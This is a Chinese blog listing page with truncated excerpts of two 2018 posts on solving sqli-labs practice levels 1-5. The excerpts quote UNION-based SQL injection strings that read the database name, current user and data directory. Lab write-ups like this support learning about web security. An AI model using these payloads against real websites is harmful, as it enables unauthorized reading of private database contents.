2018年4月16日
sqlilabs 5
摘要: 第一个1不断返回true,2可以进行更改?id=-1' union select 1,2,3 and '1?id=-1' union select 1,2,3 and 1='1 ?id=-1' union select 1,@@datadir,3 and '1@@datadir可以替换为 curre 阅读全文
posted @ 2018-04-16 22:29 CMlhc 阅读(125) 评论(0) 推荐(0) 编辑
sqlilabs 1-4
摘要: near '1' --+ ' LIMIT 0,1 ?id=999' union select 1,database(),5 --+ 当前数据库?id=999' union select 1,user(),5 --+ 当前用户名 爆数据库?id=-1' union select 1,group_con 阅读全文
posted @ 2018-04-16 22:21 CMlhc 阅读(112) 评论(0) 推荐(0) 编辑